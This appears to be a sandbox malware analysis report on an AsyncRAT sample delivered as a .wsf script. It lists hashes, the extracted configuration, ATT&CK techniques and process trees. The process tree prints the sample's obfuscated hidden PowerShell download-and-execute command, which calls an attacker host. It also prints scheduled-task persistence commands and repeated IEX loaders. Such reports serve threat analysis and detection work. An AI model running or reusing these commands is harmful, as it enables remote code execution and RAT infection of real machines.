asyncrat | b4ff5c622e5adb9376cfcf8a3c976284b37015efeb9e43ea36a8c24316660155

Analysis

max time kernel
1724s
max time network
1793s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
19/08/2024, 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Statment#411250790.wsf
Size

16KB
MD5

450154e40b6c5ec964d699997d4accbc
SHA1

a23d2705fec39950f683533e8693b4898325cb6a
SHA256

479d9ea7ed356b47f2030b6542e53ee0d5238b0f389ad459a8800917e2d16772
SHA512

01f4403bd6472dd68eee7346d4955d927f2105008ea327c97b2fb933c29dbb010c396e70a6969e3388a65663d282bcb76369828b479009d55915a84f6aea063e
SSDEEP

384:SiXLS8hwyhJoFJMtNGaiBFiXLS8hwyhJoFJMtNGaiBa:PXLS9yhJqJMtNX04XLS9yhJqJMtNX0a

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/Cka9utmL

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	168	WScript.exe
4	1004	powershell.exe
14	1004	powershell.exe
16	1004	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4872	powershell.exe
1004	powershell.exe
4508	powershell.exe
200	powershell.exe
4488	powershell.exe
2572	powershell.exe
2516	powershell.exe
2772	powershell.exe
2612	powershell.exe
4644	powershell.exe
168	powershell.exe
5000	powershell.exe
216	powershell.exe
920	powershell.exe
884	powershell.exe
1108	powershell.exe
5016	powershell.exe
1004	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	pastebin.com
7	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	api.ipify.org
14	api.ipify.org

Suspicious use of SetThreadContext 17 IoCs

description	pid	Process	procid_target
PID 5000 set thread context of 3492	5000	powershell.exe	81
PID 2516 set thread context of 2100	2516	powershell.exe	88
PID 2772 set thread context of 4484	2772	powershell.exe	92
PID 4488 set thread context of 4052	4488	powershell.exe	96
PID 216 set thread context of 4628	216	powershell.exe	100
PID 2612 set thread context of 8	2612	powershell.exe	104
PID 920 set thread context of 3732	920	powershell.exe	111
PID 4872 set thread context of 3160	4872	powershell.exe	115
PID 4644 set thread context of 4592	4644	powershell.exe	120
PID 884 set thread context of 1044	884	powershell.exe	124
PID 1004 set thread context of 164	1004	powershell.exe	129
PID 1108 set thread context of 1728	1108	powershell.exe	133
PID 2572 set thread context of 1060	2572	powershell.exe	138
PID 4508 set thread context of 3376	4508	powershell.exe	142
PID 200 set thread context of 1620	200	powershell.exe	146
PID 168 set thread context of 1960	168	powershell.exe	152
PID 5016 set thread context of 708	5016	powershell.exe	157

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3852	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
3492	aspnet_compiler.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe
2772	powershell.exe
2772	powershell.exe
2772	powershell.exe
4488	powershell.exe
4488	powershell.exe
4488	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
884	powershell.exe
884	powershell.exe
884	powershell.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
200	powershell.exe
200	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3492	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	3492	aspnet_compiler.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	200	powershell.exe
Token: SeDebugPrivilege	168	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3492	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 168 wrote to memory of 1004	168	WScript.exe	74
PID 168 wrote to memory of 1004	168	WScript.exe	74
PID 1004 wrote to memory of 3852	1004	powershell.exe	76
PID 1004 wrote to memory of 3852	1004	powershell.exe	76
PID 1004 wrote to memory of 1128	1004	powershell.exe	77
PID 1004 wrote to memory of 1128	1004	powershell.exe	77
PID 1736 wrote to memory of 5000	1736	WScript.exe	79
PID 1736 wrote to memory of 5000	1736	WScript.exe	79
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 5000 wrote to memory of 3492	5000	powershell.exe	81
PID 2932 wrote to memory of 2516	2932	WScript.exe	84
PID 2932 wrote to memory of 2516	2932	WScript.exe	84
PID 2516 wrote to memory of 4184	2516	powershell.exe	86
PID 2516 wrote to memory of 4184	2516	powershell.exe	86
PID 2516 wrote to memory of 4184	2516	powershell.exe	86
PID 2516 wrote to memory of 4712	2516	powershell.exe	87
PID 2516 wrote to memory of 4712	2516	powershell.exe	87
PID 2516 wrote to memory of 4712	2516	powershell.exe	87
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 2516 wrote to memory of 2100	2516	powershell.exe	88
PID 4084 wrote to memory of 2772	4084	WScript.exe	90
PID 4084 wrote to memory of 2772	4084	WScript.exe	90
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2772 wrote to memory of 4484	2772	powershell.exe	92
PID 2896 wrote to memory of 4488	2896	WScript.exe	94
PID 2896 wrote to memory of 4488	2896	WScript.exe	94
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4488 wrote to memory of 4052	4488	powershell.exe	96
PID 4608 wrote to memory of 216	4608	WScript.exe	98
PID 4608 wrote to memory of 216	4608	WScript.exe	98
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 216 wrote to memory of 4628	216	powershell.exe	100
PID 800 wrote to memory of 2612	800	WScript.exe	102
PID 800 wrote to memory of 2612	800	WScript.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statment#411250790.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://khalidhost.loseyourip.com:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1004
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3852
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
    3⤵
    PID:1128

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3492

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4184
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2100

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4484

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4052

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4628

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2692
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4372
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3732

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:1268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3160

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3312
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4592

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:4656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1044

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1004
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:164

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1728

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:3972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2572
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:1892
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1060

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3376

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:2932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:200
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1620

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:228
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1960

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:8
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
